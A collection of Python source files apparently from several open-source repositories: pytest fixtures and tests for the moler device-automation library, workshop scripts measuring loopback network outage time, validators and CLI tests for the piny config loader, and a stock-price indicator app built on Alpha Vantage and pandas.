default_connection = {"io_type": "terminal", "variant": "threaded"}
with mock.patch.object(dev_cfg, "named_devices", empty_named_devices):
with mock.patch.object(dev_cfg, "default_connection", default_connection):
yield
@pytest.fixture
def empty_devfactory_config():
import mock
from moler.device.device import DeviceFactory as dev_factory
with mock.patch.object(dev_factory, "_devices", {}):
with mock.patch.object(dev_factory, "_devices_params", {}):
with mock.patch.object(dev_factory, "_unique_names", {}):
with mock.patch.object(dev_factory, "_already_used_names", set()):
with mock.patch.object(dev_factory, "_was_any_device_deleted", False):
yield
@pytest.fixture
def empty_moler_config(empty_connections_config, empty_devices_config, empty_devfactory_config):
import mock
import moler.config as moler_cfg
empty_loaded_config = ["NOT_LOADED_YET"]
with mock.patch.object(moler_cfg, "loaded_config", empty_loaded_config):
yield
@pytest.fixture()
def loaded_adb_device_config(empty_moler_config):
import yaml
from moler.config import load_device_from_config
adb_dev_config_yaml = """
DEVICES:
ADB_LHOST:
DEVICE_CLASS: moler.device.adbremote2.AdbRemote2
CONNECTION_DESC:
io_type: sshshell
host: localhost
login: molerssh
password: <PASSWORD>
CONNECTION_HOPS:
UNIX_REMOTE:
ADB_SHELL:
execute_command: adb_shell
command_params:
serial_number: '1234567890'
ADB_SHELL:
ADB_SHELL_ROOT:
execute_command: su
command_params:
password: <PASSWORD>
expected_prompt: 'root@\S+#'
"""
adb_dev_config = yaml.load(adb_dev_config_yaml, Loader=yaml.FullLoader)
load_device_from_config(adb_dev_config)
@pytest.fixture()
def loaded_proxy_pc_config(empty_moler_config):
import yaml
from moler.config import load_device_from_config
config_yaml = """
DEVICES:
PROXY:
DEVICE_CLASS: moler.device.proxy_pc2.ProxyPc2
CONNECTION_DESC:
io_type: sshshell
host: localhost
login: sshproxy
password: <PASSWORD>
# no CONNECTION_HOPS since if using sshshell it jumps NOT_CONNECTED -> PROXY_PC
"""
dev_config = yaml.load(config_yaml, Loader=yaml.FullLoader)
load_device_from_config(dev_config)
@pytest.fixture()
def loaded_unix_remote_config(empty_moler_config):
import yaml
from moler.config import load_device_from_config
config_yaml = """
DEVICES:
UX_REMOTE:
DEVICE_CLASS: moler.device.unixremote2.UnixRemote2
CONNECTION_DESC:
io_type: sshshell
host: localhost
login: molerssh
password: <PASSWORD>
# using sshshell it jumps NOT_CONNECTED -> REMOTE_UNIX
CONNECTION_HOPS:
UNIX_REMOTE:
UNIX_REMOTE_ROOT:
command_params:
password: <PASSWORD>
expected_prompt: 'root@\S+#'
"""
dev_config = yaml.load(config_yaml, Loader=yaml.FullLoader)
load_device_from_config(dev_config)
@pytest.fixture()
def uxlocal2proxypc_connection_hops():
import yaml
hops_yaml = """
UNIX_LOCAL:
PROXY_PC:
execute_command: ssh
command_params:
host: localhost
login: sshproxy
password: <PASSWORD>
expected_prompt: 'sshproxy@\S+'
"""
hops = yaml.load(hops_yaml, Loader=yaml.FullLoader)
return hops
@pytest.fixture()
def proxypc2uxremote_connection_hops():
import yaml
hops_yaml = """
PROXY_PC:
UNIX_REMOTE:
execute_command: ssh
command_params:
host: localhost
login: molerssh
password: <PASSWORD>
expected_prompt: 'molerssh@\S+'
"""
hops = yaml.load(hops_yaml, Loader=yaml.FullLoader)
return hops
@pytest.fixture()
def ux2uxroot_connection_hops():
import yaml
hops_yaml = """
UNIX_REMOTE:
UNIX_REMOTE_ROOT:
command_params:
password: <PASSWORD>
expected_prompt: 'root@\S+#'
"""
hops = yaml.load(hops_yaml, Loader=yaml.FullLoader)
return hops
@pytest.fixture()
def proxypc2uxroot_connection_hops(proxypc2uxremote_connection_hops, ux2uxroot_connection_hops):
hops = proxypc2uxremote_connection_hops
hops.update(ux2uxroot_connection_hops)
return hops
@pytest.fixture()
def uxlocal2uxremote_connection_hops(uxlocal2proxypc_connection_hops,
proxypc2uxroot_connection_hops):
hops = uxlocal2proxypc_connection_hops
hops.update(proxypc2uxroot_connection_hops)
return hops
@pytest.fixture()
def ux2adbshell_connection_hops():
import yaml
hops_yaml = """
UNIX_REMOTE:
ADB_SHELL:
execute_command: adb_shell
command_params:
serial_number: '1234567890'
"""
hops = yaml.load(hops_yaml, Loader=yaml.FullLoader)
return hops
@pytest.fixture()
def adbshell2adbshellroot_connection_hops():
import yaml
hops_yaml = """
ADB_SHELL:
ADB_SHELL_ROOT:
execute_command: su
command_params:
password: <PASSWORD>
expected_prompt: 'root@\S+#'
"""
hops = yaml.load(hops_yaml, Loader=yaml.FullLoader)
return hops
@pytest.fixture()
def proxypc2adbshell_connection_hops(proxypc2uxremote_connection_hops,
ux2adbshell_connection_hops, adbshell2adbshellroot_connection_hops):
hops = proxypc2uxremote_connection_hops
hops.update(adbshell2adbshellroot_connection_hops)
hops.update(ux2adbshell_connection_hops)
return hops
@pytest.fixture()
def uxlocal2adbshell_connection_hops(uxlocal2proxypc_connection_hops,
proxypc2adbshell_connection_hops):
hops = uxlocal2proxypc_connection_hops
hops.update(proxypc2adbshell_connection_hops)
return hops
```
#### File: test/integration/test_io_device_unix_on_terminal.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import pytest
from moler.device.unixlocal import UnixLocal
from moler.exceptions import DeviceFailure
from moler.util.moler_test import MolerTest
def test_unix_device_can_execute_cmds():
unix = UnixLocal(io_type='terminal', variant='threaded')
unix.establish_connection()
cmd = unix.get_cmd(
cmd_name='ls',
cmd_params={
"options": "-l"
}
)
r = cmd()
assert (r is not None)
cmd = unix.get_cmd('whoami')
r = cmd()
assert (r is not None)
def test_device_unix_can_not_execute_cmds_in_incorect_state():
unix = UnixLocal(io_type='terminal', variant='threaded')
unix.establish_connection()
unix.goto_state(UnixLocal.not_connected)
with pytest.raises(DeviceFailure, match=r'Failed to create .*-object for .* is unknown for state .* of device .*'):
unix.get_cmd(
cmd_name='cd',
cmd_params={
"path": "/home/user/"
}
)
def test_unix_local_cmd_with_event():
unix = UnixLocal(io_type='terminal', variant='threaded')
unix.establish_connection()
unix.goto_state(UnixLocal.unix_local)
rets = {'ping': None, 'whoami': None}
def callback_response():
cmd_whoami = unix.get_cmd(cmd_name="whoami")
rets['whoami'] = cmd_whoami()
event_reconnect = unix.get_event(event_name="ping_response", event_params={})
event_reconnect.add_event_occurred_callback(
callback=callback_response,
)
event_reconnect.start()
cmd_ping = unix.get_cmd(cmd_name="ping", cmd_params={'destination': '127.0.0.1', 'options': '-c 1'})
rets['ping'] = cmd_ping(timeout=5)
MolerTest.sleep(1)
assert rets['ping'] is not None
assert rets['whoami'] is not None
```
#### File: test/integration/test_thread_based_runner.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import threading
import time
import pytest
from moler.connection_observer import ConnectionObserver
def test_can_submit_connection_observer_into_background(connection_observer,
observer_runner):
connection_observer.life_status.start_time = time.time() # must start observer lifetime before runner.submit()
connection_observer_future = observer_runner.submit(connection_observer)
# see API of concurrent.futures.Future
try:
assert not connection_observer_future.done()
assert not connection_observer.done()
time.sleep(0.1) # give thread a chance to gain control
assert connection_observer_future.running()
finally: # test cleanup
connection_observer_future.cancel()
def test_CancellableFuture_can_be_cancelled_while_it_is_running(observer_runner):
from concurrent.futures import ThreadPoolExecutor, CancelledError
from moler.runner import CancellableFuture
# concurrent.futures.Future can't cancel() while it is already running
stop_running = threading.Event()
is_done = threading.Event()
def activity(stop_running, is_done):
while not stop_running.is_set():
time.sleep(0.5)
is_done.set()
future = ThreadPoolExecutor().submit(activity, stop_running, is_done)
observer_lock = threading.Lock()
c_future = CancellableFuture(future, observer_lock, stop_running, is_done)
try:
time.sleep(0.1) # allow threads switch to ensure future running
assert c_future.running()
cancelled = c_future.cancel()
time.sleep(0.1) # allow threads switch
assert not c_future.running()
assert is_done.is_set()
assert cancelled is True
assert c_future.cancelled()
assert c_future.done()
with pytest.raises(CancelledError):
c_future.result()
except AssertionError:
raise
finally:
stop_running.set()
# --------------------------- resources ---------------------------
@pytest.yield_fixture()
def observer_runner():
from moler.runner import ThreadPoolExecutorRunner
runner = ThreadPoolExecutorRunner()
yield runner
runner.shutdown()
class NetworkDownDetector(ConnectionObserver):
def __init__(self, connection=None, runner=None):
super(NetworkDownDetector, self).__init__(connection=connection, runner=runner)
self.all_data_received = []
def data_received(self, data, recv_time):
"""
Awaiting change like:
64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms
ping: sendmsg: Network is unreachable
"""
self.all_data_received.append(data)
if not self.done():
if "Network is unreachable" in data:
when_detected = time.time()
self.set_result(result=when_detected)
@pytest.fixture()
def connection_observer():
from moler.threaded_moler_connection import ThreadedMolerConnection
moler_conn = ThreadedMolerConnection()
observer = NetworkDownDetector(connection=moler_conn)
return observer
@pytest.fixture()
def observer_and_awaited_data(connection_observer):
awaited_data = 'ping: sendmsg: Network is unreachable'
return connection_observer, awaited_data
```
#### File: moler/test/test_moler_sleep.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import time
from moler.util.moler_test import MolerTest
def test_sleep_for_threaded_variant():
sleep_time = 1
start_time = time.time()
MolerTest.sleep(sleep_time)
stop_time = time.time()
elapsed = stop_time - start_time
assert round(elapsed) == sleep_time
```
#### File: moler/test/test_publisher.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import gc
import pytest
import mock
class Subscriber(object):
def __init__(self):
self.received_data = []
def on_new_data(self, data):
self.received_data.append(data)
def test_doesnt_subscribe_same_subscriber_twice():
from moler.publisher import Publisher
observer = Subscriber()
notifier = Publisher()
notifier.subscribe(subscriber=observer.on_new_data)
notifier.subscribe(subscriber=observer.on_new_data)
notifier.notify_subscribers(data=b"incoming data")
assert len(observer.received_data) == 1
def test_can_notify_multiple_subscribers_about_data():
from moler.publisher import Publisher
observer1 = Subscriber()
observer2 = Subscriber()
notifier = Publisher()
notifier.subscribe(subscriber=observer1.on_new_data)
notifier.subscribe(subscriber=observer2.on_new_data)
notifier.notify_subscribers(data=b"incoming data")
assert b"incoming data" in observer1.received_data
assert b"incoming data" in observer2.received_data
def test_notifies_only_subscribed_ones_about_data():
from moler.publisher import Publisher
observer1 = Subscriber()
observer2 = Subscriber()
observer3 = Subscriber()
notifier = Publisher()
notifier.subscribe(subscriber=observer1.on_new_data)
notifier.subscribe(subscriber=observer2.on_new_data)
notifier.notify_subscribers(data=b"incoming data")
assert b"incoming data" in observer1.received_data
assert b"incoming data" in observer2.received_data
assert b"incoming data" not in observer3.received_data # that one was not subscribed
def test_notified_subscriber_may_stop_subscription():
from moler.publisher import Publisher
notifier = Publisher()
received_data = []
def one_time_observer(data):
received_data.append(data)
notifier.unsubscribe(subscriber=one_time_observer)
notifier.subscribe(subscriber=one_time_observer)
notifier.notify_subscribers(data=b"data 1")
notifier.notify_subscribers(data=b"data 2")
assert b"data 1" in received_data
assert b"data 2" not in received_data # because of unsubscription during notification
def test_exception_in_subscriber_doesnt_break_publisher_nor_other_subscribers():
from moler.publisher import Publisher
notifier = Publisher()
received_data = []
def failing_observer(data):
raise Exception("Fail inside observer")
def one_time_observer(data):
received_data.append(data)
notifier.unsubscribe(subscriber=one_time_observer)
notifier.subscribe(subscriber=failing_observer)
notifier.subscribe(subscriber=one_time_observer)
notifier.notify_subscribers(data=b"data 1")
notifier.unsubscribe(subscriber=failing_observer)
assert b"data 1" in received_data
def test_subscriber_may_have_different_function_signature():
from moler.publisher import Publisher
notifier = Publisher()
received_data = []
def no_param_fun():
received_data.append("no_param_fun")
notifier.subscribe(subscriber=no_param_fun)
notifier.notify_subscribers()
assert received_data[-1] == "no_param_fun"
notifier.unsubscribe(subscriber=no_param_fun)
def single_param_fun(data):
received_data.append(("single_param_fun", data))
notifier.subscribe(subscriber=single_param_fun)
notifier.notify_subscribers(data=b"data 1")
assert received_data[-1] == ("single_param_fun", b"data 1")
notifier.unsubscribe(subscriber=single_param_fun)
def multi_param_fun(data, info, default=None):
received_data.append(("multi_param_fun", data, info, default))
notifier.subscribe(subscriber=multi_param_fun)
notifier.notify_subscribers(data="data1", info="INFO", default="DEF")
assert received_data[-1] == ("multi_param_fun", "data1", "INFO", "DEF")
notifier.notify_subscribers(data="data2", info="INFO")
assert received_data[-1] == ("multi_param_fun", "data2", "INFO", None)
notifier.unsubscribe(subscriber=multi_param_fun)
def variable_param_fun(*args, **kwargs):
received_data.append(("variable_param_fun", args, kwargs))
notifier.subscribe(subscriber=variable_param_fun)
notifier.notify_subscribers("data1", "INFO", "DEF")
assert received_data[-1] == ("variable_param_fun", ("data1", "INFO", "DEF"), {})
notifier.notify_subscribers(data="data2", info="INFO", default="DEF")
assert received_data[-1] == ("variable_param_fun", (), {"data": "data2", "info": "INFO", "default": "DEF"})
notifier.notify_subscribers("data3", info="INFO", default="DEF")
assert received_data[-1] == ("variable_param_fun", ("data3",), {"info": "INFO", "default": "DEF"})
notifier.unsubscribe(subscriber=variable_param_fun)
def test_subscriber_must_have_function_signature_matching_the_one_expected_by_publisher():
from moler.publisher import Publisher
notifier = Publisher()
received_data = []
def compatible_fun(data, info, default=None):
received_data.append(("compatible_fun", data, info, default))
def incompatible_fun(data):
received_data.append(("incompatible_fun", data))
notifier.subscribe(subscriber=compatible_fun)
notifier.subscribe(subscriber=incompatible_fun)
def handle_exception(self, subscriber_owner, subscriber_function, raised_exception):
assert subscriber_owner is None
assert subscriber_function.__name__ == "incompatible_fun"
assert isinstance(raised_exception, TypeError)
assert "unexpected keyword argument 'info'" in str(raised_exception)
with mock.patch.object(notifier.__class__, "handle_subscriber_exception", handle_exception):
notifier.notify_subscribers(data="data1", info="INFO", default="DEF")
assert received_data == [("compatible_fun", "data1", "INFO", "DEF")] # only 1 entry
notifier.unsubscribe(subscriber=compatible_fun)
notifier.unsubscribe(subscriber=incompatible_fun)
def test_repeated_unsubscription_does_nothing_but_logs_warning():
"""
Because of possible different concurrency models (and their races)
we don't want to raise exception when there is already
"no such subscription" - just put warning to logs
"""
from moler.publisher import Publisher
notifier = Publisher()
received_data = []
def one_time_observer(data):
received_data.append(data)
notifier.unsubscribe(subscriber=one_time_observer)
notifier.subscribe(subscriber=one_time_observer)
notifier.notify_subscribers(data=b"data 1")
notifier.unsubscribe(subscriber=one_time_observer)
# TODO: check warning in logs (when we set logging system)
notifier.notify_subscribers(data=b"data 2")
assert b"data 1" in received_data
assert b"data 2" not in received_data # because of unsubscription during notification
def test_single_unsubscription_doesnt_impact_other_subscribers():
from moler.publisher import Publisher
observer1 = Subscriber()
observer2 = Subscriber()
function_received_data = []
def raw_fun1(data):
function_received_data.append(data)
def raw_fun2(data):
function_received_data.append(data)
class TheCallableClass(object):
def __init__(self):
self.received_data = []
def __call__(self, data):
self.received_data.append(data)
callable1 = TheCallableClass()
callable2 = TheCallableClass()
notifier = Publisher()
notifier.subscribe(subscriber=observer1.on_new_data)
notifier.subscribe(subscriber=observer2.on_new_data)
notifier.subscribe(subscriber=observer2.on_new_data)
notifier.unsubscribe(subscriber=observer1.on_new_data)
notifier.unsubscribe(subscriber=observer1.on_new_data)
notifier.subscribe(subscriber=raw_fun1)
notifier.subscribe(subscriber=raw_fun2)
notifier.subscribe(subscriber=raw_fun2)
notifier.unsubscribe(subscriber=raw_fun1)
notifier.subscribe(subscriber=callable1)
notifier.subscribe(subscriber=callable2)
notifier.subscribe(subscriber=callable2)
notifier.unsubscribe(subscriber=callable1)
notifier.notify_subscribers("incoming data")
assert observer1.received_data == []
assert observer2.received_data == ["incoming data"]
assert function_received_data == ["incoming data"]
assert callable1.received_data == []
assert callable2.received_data == ["incoming data"]
def test_subscription_doesnt_block_subscriber_to_be_garbage_collected():
from moler.publisher import Publisher
notifier = Publisher()
garbage_collected_subscribers = []
class GcSubscriber(object):
def __del__(self):
garbage_collected_subscribers.append('Subscriber')
subscr = GcSubscriber()
notifier.subscribe(subscr)
del subscr
gc.collect()
assert 'Subscriber' in garbage_collected_subscribers
def test_garbage_collected_subscriber_is_not_notified():
from moler.publisher import Publisher
notifier = Publisher()
received_data = []
class GcSubscriber(object):
def __call__(self, data):
received_data.append(data)
subscr1 = GcSubscriber()
subscr2 = GcSubscriber()
notifier.subscribe(subscriber=subscr1)
notifier.subscribe(subscriber=subscr2)
del subscr1
gc.collect()
notifier.notify_subscribers("data")
assert len(received_data) == 1
```
#### File: test/unix/test_cmd_cut.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
from moler.cmd.unix.cut import Cut
from moler.exceptions import CommandFailure
import pytest
def test_cut_raise_exception(buffer_connection, command_output_and_expected_result):
command_output, expected_result = command_output_and_expected_result
buffer_connection.remote_inject_response([command_output])
cut_cmd = Cut(connection=buffer_connection.moler_connection)
with pytest.raises(CommandFailure):
cut_cmd()
@pytest.fixture
def command_output_and_expected_result():
data = """host:~ # cut
cut: you must specify a list of bytes, characters, or fields
Try 'cut --help' for more information.
host:~ #"""
result = {
'LINES': []
}
return data, result
```
#### File: workshop1/step12/network_outage.py
```python
import os.path
import time
from moler.config import load_config
from moler.device.device import DeviceFactory
from moler.util.moler_test import MolerTest
def outage_callback(device_name, ping_times):
MolerTest.info("Network outage on {}".format(device_name))
ping_times["lost_connection_time"] = time.time()
def ping_is_on_callback(ping_times):
MolerTest.info("Ping works")
if ping_times["lost_connection_time"] > 0: # ping operable AFTER any net loss
if ping_times["reconnection_time"] == 0:
ping_times["reconnection_time"] = time.time()
outage_time = ping_times["reconnection_time"] - ping_times["lost_connection_time"]
MolerTest.info("Network outage time is {}".format(outage_time))
def test_network_outage():
load_config(config=os.path.abspath('config/my_devices.yml'))
unix1 = DeviceFactory.get_device(name='MyMachine1')
unix2 = DeviceFactory.get_device(name='MyMachine2')
# test setup
ping_times = {"lost_connection_time": 0,
"reconnection_time": 0}
# ensure network is up before running test
net_up = unix2.get_cmd(cmd_name="ifconfig", cmd_params={"options": "lo up"})
sudo_ensure_net_up = unix2.get_cmd(cmd_name="sudo", cmd_params={"password": "<PASSWORD>", "cmd_object": net_up})
sudo_ensure_net_up()
# run event observing "network down/up"
no_ping = unix1.get_event(event_name="ping_no_response")
no_ping.add_event_occurred_callback(callback=outage_callback,
callback_params={'device_name': 'MyMachine1',
'ping_times': ping_times})
no_ping.start()
ping_is_on = unix1.get_event(event_name="ping_response")
ping_is_on.add_event_occurred_callback(callback=ping_is_on_callback,
callback_params={'ping_times': ping_times})
ping_is_on.start()
# run test
ping = unix1.get_cmd(cmd_name="ping", cmd_params={"destination": "localhost", "options": "-O"})
ping.start(timeout=120)
time.sleep(3)
ifconfig_down = unix2.get_cmd(cmd_name="ifconfig", cmd_params={"options": "lo down"})
sudo_ifconfig_down = unix2.get_cmd(cmd_name="sudo", cmd_params={"password": "<PASSWORD>", "cmd_object": ifconfig_down})
sudo_ifconfig_down()
time.sleep(5)
ifconfig_up = unix2.get_cmd(cmd_name="ifconfig", cmd_params={"options": "lo up"})
sudo_ifconfig_up = unix2.get_cmd(cmd_name="sudo", cmd_params={"password": "<PASSWORD>", "cmd_object": ifconfig_up})
sudo_ifconfig_up()
time.sleep(3)
# test teardown
ping.cancel()
no_ping.cancel()
if __name__ == '__main__':
test_network_outage()
"""
copy this file into workshop1/network_outage.py
*** calculating network outage time ***
1. run it
2. see logs - look for "Network outage" and "Ping works"
- be carefull in logs analysis - what's wrong?
3. fix incorrect calculation by exchanging:
no_ping = unix1.get_event(event_name="ping_no_response")
into:
no_ping = unix1.get_event(event_name="ping_no_response", event_params={"till_occurs_times": 1})
"""
```
#### File: workshop1/step1/network_outage.py
```python
import os.path
from moler.config import load_config
from moler.device.device import DeviceFactory
def test_network_outage():
load_config(config=os.path.abspath('my_devices.yml'))
unix1 = DeviceFactory.get_device(name='MyMachine1')
unix2 = DeviceFactory.get_device(name='MyMachine2')
if __name__ == '__main__':
test_network_outage()
"""
copy this file into workshop1/network_outage.py
1. run it
2. check logs
3. add PATH to LOGGER configuration & check logs
- if not given then logs are created is current working directory
4. add RAW_LOG: True & check logs
5. add DEBUG_LEVEL: DEBUG & check logs
6. add DATE_FORMAT: "%Y-%m-%d %H:%M:%S" & check logs
"""
``` |
{
"source": "jochenparm/piny",
"score": 3
} |
#### File: piny/piny/validators.py
```python
from abc import ABC, abstractmethod
from typing import Any, Dict, List, Union
from .errors import ValidationError
LoadedData = Union[Dict[str, Any], List[Any]]
class Validator(ABC):
"""
Abstract base class for optional validator classes
Use only to derive new child classes, implement all abstract methods
"""
def __init__(self, schema: Any, **params):
self.schema = schema
self.schema_params = params
@abstractmethod
def load(self, data: LoadedData, **params):
"""
Load data, return validated data or raise en error
"""
pass # pragma: no cover
class PydanticValidator(Validator):
"""
Validator class for Pydantic library
"""
def load(self, data: LoadedData, **params):
try:
return self.schema(**{**data, **params}).dict()
except Exception as e:
raise ValidationError(origin=e, reason=str(e))
class MarshmallowValidator(Validator):
"""
Validator class for Marshmallow library
"""
def load(self, data: LoadedData, **params):
try:
return self.schema(**self.schema_params).load(data, **params).data
except Exception as e:
raise ValidationError(origin=e, reason=str(e))
class TrafaretValidator(Validator):
"""
Validator class for Trafaret library
"""
def load(self, data: LoadedData, **params):
try:
return self.schema.check(data)
except Exception as e:
raise ValidationError(origin=e, reason=str(e))
```
#### File: piny/tests/test_cli.py
```python
from unittest import mock
import pytest
import yaml
from click.testing import CliRunner
from piny import LoadingError
from piny.cli import cli
from . import config_directory
def test_cli_input_stdin_output_stdout():
runner = CliRunner()
with mock.patch("piny.matchers.StrictMatcher.constructor") as expand_mock:
expand_mock.return_value = "<PASSWORD>"
result = runner.invoke(cli, input="password: ${DB_PASSWORD}")
assert result.exit_code == 0
assert result.stdout == "password: <PASSWORD>"
def test_cli_input_file_output_file():
runner = CliRunner()
with open(config_directory.joinpath("db.yaml"), "r") as f:
input_lines = f.readlines()
with runner.isolated_filesystem():
with open("input.yaml", "w") as input_fd:
input_fd.writelines(input_lines)
with mock.patch("piny.matchers.StrictMatcher.constructor") as expand_mock:
expand_mock.return_value = "<PASSWORD>"
result = runner.invoke(cli, ["input.yaml", "output.yaml"])
with open("output.yaml", "r") as output_fd:
output_lines = output_fd.readlines()
assert result.exit_code == 0
assert "password: <PASSWORD>" in map(
lambda x: x.strip(), output_lines
)
def test_cli_fail():
runner = CliRunner()
with mock.patch("piny.loaders.yaml.load") as loader_mock:
loader_mock.side_effect = yaml.YAMLError("Oops!")
result = runner.invoke(cli, input="password: ${DB_PASSWORD}")
assert result.exit_code == 1
assert type(result.exception) == LoadingError
``` |
{
"source": "jochenruland/stock_price_indicator",
"score": 4
} |
#### File: app/data_wrangling/process_data.py
```python
import sys
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import datetime as dt
from alpha_vantage.timeseries import TimeSeries
import os.path
# Download data from Alpha-Vantage
A_key = '<KEY>'
def download_stock_data(symbol, API_key= A_key):
try:
ts = TimeSeries(key = API_key, output_format = 'pandas')
data = ts.get_daily_adjusted(symbol, outputsize='full')
symbol = symbol.upper()
df = data[0]['5. adjusted close'].reset_index().rename(columns={"5. adjusted close": symbol}).sort_values('date', ascending =True)
df.to_csv(symbol+'.csv', index = False)
return df
except Exception as e:
print('Execption occurred: {}'.format(e))
# Import data from csv file
def get_data(symbol='AAPL', start_date='2020-01-01', end_date='2020-12-31'):
'''
Setup an empty dataframe with the given timeperiod as index to be used as instance for further gathered data.
Then loads data from a .csv file for the selected symbol and selects the Adj Close column
INPUT:
symbols - list - symbols of listed stocks
start_date - datetime - Beginning of the period to analyze
end_date - datetime - End of the period to analyze
OUTPUT
df - dataframe - Dataframe containing the Adj Close for the symbol with the time period as index (ordered ascending)
'''
try:
dates= pd.date_range(start_date, end_date)
df = pd.DataFrame(index=dates)
if os.path.isfile(symbol+'.csv') == False:
print("No such file exists; will be downloaded")
download_stock_data(symbol)
df_tmp = pd.read_csv(symbol+'.csv', index_col = 'date')
df = df.join(df_tmp)
df = df.dropna()
return df
except Exception as e:
print('Execption occurred: {}'.format(e))
# Noramlize the stock price data
def normalize_stock_data(df):
df = df/df.iloc[0,:]
return df
class StockDataAnalysis():
''' Creates a StockDataAnalysis object which is able to take one or mutiple stock symbols and a timeframe and then computes
a range of indicators on the stock data and plots the results'''
def __init__(self, symbol='AAPL', start_date='2020-01-01', end_date='2021-04-16'):
''' Create an instance of StockDataAnalysis'''
self.symbol = symbol
if isinstance(start_date, str):
self.start_date = dt.datetime.strptime(start_date, '%Y-%m-%d')
self.end_date = dt.datetime.strptime(end_date, '%Y-%m-%d')
else:
self.start_date = start_date
self.end_date = end_date
self.data = get_data(self.symbol, self.start_date, self.end_date)
if self.data.shape[0] != 0:
self.data_norm = normalize_stock_data(self.data)
# Plot stock price data and check for anomalies
def plot_stock_data(self, normalized=True):
if normalized:
df = self.data_norm
title_str = 'Relative stock price development'
else:
df = self.data
title_str = 'Absolute stock price development'
if isinstance(df, pd.Series):
plt.figure(figsize=(12,8))
ax1 = df.plot()
ax1.set_xlabel('time')
ax1.set_ylabel('price')
ax1.set_title(title_str)
plt.legend(loc='upper right')
plt.show()
else:
plt.figure(figsize=(12,18))
ax2 = plt.subplot(2,1,1)
ax2.set_xlabel('time')
ax2.set_ylabel('price development')
ax2.set_title(title_str)
for col in df.columns:
df[col].plot()
plt.legend(loc='upper right')
plt.show()
def calculate_rolling_stats(self, win=10):
rm = self.data_norm.rolling(window=win).mean()
rstd = self.data_norm.rolling(window=win).std()
self.sma = rm.dropna()
self.rstd = rstd.dropna()
def calculate_bollinger_bands(self):
self.b_upper_band = self.sma + self.rstd*2
self.b_lower_band = self.sma - self.rstd*2
def calculate_daily_returns(self):
daily_returns = self.data.copy()
daily_returns[1:] = (self.data[1:]/self.data[:-1].values) - 1
daily_returns.iloc[0,:] = 0
self.daily_returns = daily_returns
def calculate_cumulative_returns(self):
cumulative_returns = self.data.copy
cumulative_returns= (self.data/self.data.iloc[0]) - 1
self.cumulative_returns = cumulative_returns
def calculate_momentum(self, win=5):
self.momentum = self.data.copy()
self.momentum[win:] = (self.data[win:]/self.data[:-(win)].values) - 1
self.momentum.iloc[0:(win),:] = 0
def get_market_index(self, market_ix='SPY'):
self.market_ix = market_ix
self.market_index = get_data(symbol=market_ix, start_date=self.start_date, end_date=self.end_date)
def setup_features(self, market_ix='SPY'):
self.calculate_rolling_stats()
self.calculate_bollinger_bands()
self.calculate_daily_returns()
self.calculate_cumulative_returns()
self.calculate_momentum()
self.get_market_index(market_ix=market_ix)
def create_indicator_dataframe(self):
''' Function which which takes the Adj Close and corresponding dates per symbol, adds a new column containing the symbol
and joins all indicators to one dataframe
INPUT:
object
OUTPUT:
indicator_df - dataframe - contains the Adj Close and all indicators as features tagged by the symbol '''
self.indicator_df = pd.DataFrame(columns=['Date','Symbol', 'Adj Close','Daily Returns','Cumulative Returns','SMA', 'Momentum', 'Upper Band','Lower Band','Market Index'])
for symbol in self.data.columns:
df_temp = self.data[symbol].reset_index().rename(columns={'index':'Date', symbol:'Adj Close'})
df_temp['Symbol'] = symbol
df_temp = df_temp.join(self.daily_returns[symbol], on='Date').rename(columns={symbol:'Daily Returns'})
df_temp = df_temp.join(self.cumulative_returns[symbol], on='Date').rename(columns={symbol:'Cumulative Returns'})
df_temp = df_temp.join(self.sma[symbol], on='Date').rename(columns={symbol:'SMA'})
df_temp = df_temp.join(self.momentum[symbol], on='Date').rename(columns={symbol:'Momentum'})
df_temp = df_temp.join(self.b_upper_band[symbol], on='Date').rename(columns={symbol:'Upper Band'})
df_temp = df_temp.join(self.b_lower_band[symbol], on='Date').rename(columns={symbol:'Lower Band'})
df_temp = df_temp.join(self.market_index[self.market_ix], on='Date').rename(columns={self.market_ix:'Market Index'})
self.indicator_df = pd.concat([self.indicator_df, df_temp])
self.indicator_df.fillna(method='ffill', inplace=True)
self.indicator_df.fillna(method='bfill', inplace=True)
self.indicator_df.dropna()
return self.indicator_df
def main(symbol='APPL', start_date='2020-01-01', end_date='2020-12-31'):
''' This Function creates an instance of the StockDataAnalysis class and plots the result '''
try:
st_data = StockDataAnalysis(symbol=symbol, start_date=start_date, end_date=end_date)
st_data.setup_features()
df_indicators = st_data.create_indicator_dataframe()
print(df_indicators.head(50))
st_data.plot_stock_data(normalized=False)
except Exception as e:
print('Execption occurred: {}'.format(e))
if __name__ == '__main__':
main()
```
#### File: stock_price_indicator/app/ETL.py
```python
import sys
import pandas as pd
import datetime as dt
import numpy as np
import matplotlib.pyplot as plt
import sqlite3
from data_wrangling.process_data import StockDataAnalysis
from data_wrangling.train_classifier import ModelStockPrice
def main():
try:
print('Enter start date in date format (YYYY-MM-DD):')
start_date = input()
sd = dt.datetime.strptime(start_date, '%Y-%m-%d')
print('Enter end date in date format (YYYY-MM-DD):')
end_date = input()
ed = dt.datetime.strptime(end_date, '%Y-%m-%d')
if start_date >= end_date:
return print('Start date must be before end date')
elif (ed - sd).days < 30:
return print('Timeframe between start date and end date must be minimum 30 days')
elif ed > dt.datetime.now():
return print('End date must be equal or before actual date')
else:
print('Enter a comma seperated list of ticker symbols (f.ex. AAPL,GOOG,BABA):')
symbols_str = input()
symbol_lst = symbols_str.replace(" ", "").split(",")
if not symbol_lst:
return print("No ticker symbol was entered")
else:
for s in symbol_lst:
s=s.upper()
st_data = StockDataAnalysis(symbol=s,start_date=sd, end_date=ed)
if st_data.data.shape[0] == 0:
print('No data could be found for ticker symbol {}'.format(s))
else:
st_data.setup_features()
df_indicators = st_data.create_indicator_dataframe()
conn = sqlite3.connect('indicators.db')
df_indicators.to_sql(s, con = conn, if_exists='replace', index=False)
print('Stock data for {} has been saved to indicators.db'.format(s))
except Exception as e:
print('Execption occurred: {}'.format(e))
